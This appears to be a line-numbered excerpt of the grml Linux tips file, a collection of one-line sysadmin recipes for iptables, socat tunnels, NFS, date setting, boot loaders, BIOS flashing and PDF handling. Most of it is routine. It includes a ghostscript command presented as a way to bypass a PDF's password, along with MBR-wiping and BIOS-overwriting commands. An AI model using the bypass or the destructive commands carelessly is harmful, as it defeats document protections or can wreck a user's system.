2556 Remember to add the --utc -option if the hardware clock is set
2562 Check your current settings via:
2565 zdump /etc/localtime
2568 grep hwclock /etc/runlevel.conf
2569 grep '^UTC' /etc/default/rc
2571 Further information:
2572 --------------------
2574 hwclock(8) tzselect(1) tzconfig(8)
2575 http://www.debian.org/doc/manuals/system-administrator/ch-sysadmin-time.html
2576 http://wiki.debian.org/TimeZoneChanges
2578 Recorder shellscript session using script:
2580 % script -t 2>~/upgrade.time -a ~/upgrade.script
2581 % scriptreplay ~/upgrade.time ~/upgrade.script
2583 Test UTF-8 capabilities of terminal:
2585 wget http://melkor.dnp.fmph.uniba.sk/~garabik/debian-utf8/download/UTF-8-demo.txt.gz
2586 zcat UTF-8-demo.txt.gz
2590 wget http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt
2593 UTF-8 at grml / some general information regarding Unicde/UTF-8:
2595 http://wiki.grml.org/doku.php?id=utf8
2598 This allows one ssh connection attepmt per minute per source ip, with a initial
2599 burst of 10. The available burst is like a counter which is initialised with
2600 10. Every connection attempt decrements the counter, and every minute where the
2601 connection limit of one per minute is not overstepped the counter is
2602 incremented by one. If the burst counter is exhausted the real rate limit
2603 comes into play. This gives you 11 connectionattepmts in the first minute
2604 before blocked for 10minutes. After 10 minutes block the game restarts.
2606 Hint: you could set the burst value to 5 and the block time to only 5 minutes
2607 to achive the same average connection rate but with halve the block time.
2609 iptables -A inet_in -p tcp --syn --dport 22 -m hashlimit --hashlimit-name ssh \
2610 --hashlimit 1/minute \ --hashlimit-burst 10 --hashlimit-mode srcip \
2611 --hashlimit-htable-expire 600000 -j ACCEPT
2612 iptables -A inet_in -p tcp --dport 22 -m state --state NEW -j REJECT
2614 Tunnel a specific connection via socat:
2617 % socat TCP4-LISTEN:8003 TCP4:gateway:500
2620 # socat TCP4-LISTEN:500,fork TCP4:target:$PORT
2622 Using localhost:8003 on the client uses the tunnel now.
2626 # date --set=060916102007
2628 where the bits are month(2)/day(2)/hour(2)/minute(2)/year(4)
2630 Set date using a relative date:
2636 # date -s '+tomorrow'
2638 Display a specific relative date:
2640 # date -d '+5 days -2 hours'
2642 Don't forget to set hardware clock via:
2646 Booting grml via network / PXE:
2648 Start grml-terminalserver on a system with network access
2649 and where grml is running:
2651 # grml-terminalserver
2653 Then booting your client(s) via PXE should work without
2656 Debugging SSL communications:
2658 % openssl s_client -connect server.adress:993
2662 # ssldump -a -A -H -i eth0
2664 See http://prefetch.net/articles/debuggingssl.html for more details.
2666 Remove bootmanager from MBR:
2668 # lilo -M /dev/hda -s /dev/null
2670 Rewrite grub to MBR:
2673 # grub-install --recheck --no-floppy --root-directory=/mnt/sda1 /dev/sda
2675 Rewrite lilo to MBR:
2680 Create screenshot of plain/real console - tty1:
2682 # fbgrab -c 1 screeni.png
2684 Create screenshot when running X:
2688 Tip: use the gkrellshoot plugin when using gkrellm
2690 Redirect all connections to hostA:portA to hostB:portB, where hostA and hostB are
2693 Run the following commands on hostA:
2695 echo 1 > /proc/sys/net/ipv4/ip_forward
2696 iptables -t nat -A PREROUTING -p tcp --dport portA -j DNAT --to hostB:portB
2697 iptables -A FORWARD -i eth0 -o eth0 -d hostB -p tcp --dport portB -j ACCEPT
2698 iptables -A FORWARD -i eth0 -o eth0 -s hostB -p tcp --sport portB -j ACCEPT
2699 iptables -t nat -A POSTROUTING -p tcp -d hostB --dport portB -j SNAT --to-source hostA
2701 Flash BIOS without DOS/Windows:
2703 Dump flash info and set the flash chip to writable:
2706 Backup the original BIOS:
2707 # flashrom -r backup.bin
2709 Notice: the following step will overwrite your current BIOS!
2710 So make sure you really know what you are doing.
2712 Flash the BIOS image:
2713 # flashrom -wv newbios.bin
2715 Also check out LinuxBIOS: http://linuxbios.org/
2717 Enable shadow passwords:
2721 Set up an IPv6 tunneln on grml:
2725 Set up console newsreader slrn for use with Usenet:
2729 Calculate with IPv6 addresses:
2733 For usage examples refer to manpage ipv6calc(8).
2735 Common network debugging tools for use with IPv6:
2744 Set up NFS (Network File System):
2748 Make sure the relevant services are running on the server side:
2750 # /etc/init.d/portmap start
2751 # /etc/init.d/nfs-common start
2752 # /etc/init.d/nfs-kernel-server start
2754 Export shares via /etc/exports:
2756 /backups 192.168.1.100/24(rw,wdelay,no_root_squash,async,subtree_check)
2758 ... or manually export a directory running:
2760 # exportfs -o rw,wdelay,no_root_squash,async,subtree_check 192.168.1.100:/backups
2762 and unexport a share running:
2764 # exportfs -u 192.168.1.100:/backups
2766 and every time when you modify /etc/exports file run
2770 Display what NFS components are running:
2774 Display list of exported shares:
2782 Make sure the relevant services are running on the client side:
2784 # /etc/init.d/portmap start
2785 # /etc/init.d/nfs-common start
2787 Verify that the server allows you to access its RPC/NFS services:
2789 # rpcinfo -p server_name
2791 Check what directories the server exports:
2793 # showmount -e server_name
2795 On the client side you can use something like the following in /etc/fstab:
2797 192.168.1.101:/backups /mnt/nfs nfs defaults,users,wsize=8192,rsize=8192 0 0
2801 # aptitude install cloop-src
2804 # modprobe cloop file=/path/to/cloop/file
2805 # mount -r -t iso9660 /dev/cloop /mnt/test
2807 Create a PS/PDF of a plaintext file:
2809 % a2ps --medium A4dj -E -o output.ps input_file
2812 Print two pages on one in a PDF file:
2814 % pdfnup --nup 2x1 input.pdf
2816 Concatenate, extract pages/parts, encrypt/decrypt,
2817 compress PDFs using 'pdftk'.
2819 Read a PS/PDF file on console:
2823 or on plain framebuffer console in graphical mode:
2825 % pdf2ps file.pdf ; ps2png file.ps file.png ; fbi file.png
2831 Bypass the password of a PDF file:
2833 % gs -q -dNOPAUSE -sDEVICE=pdfwrite -sOutputFile=output.pdf input.pdf -c quit
2839 This will record a AIFF audio file.
2841 Change passphrase / password of an existing SSH key: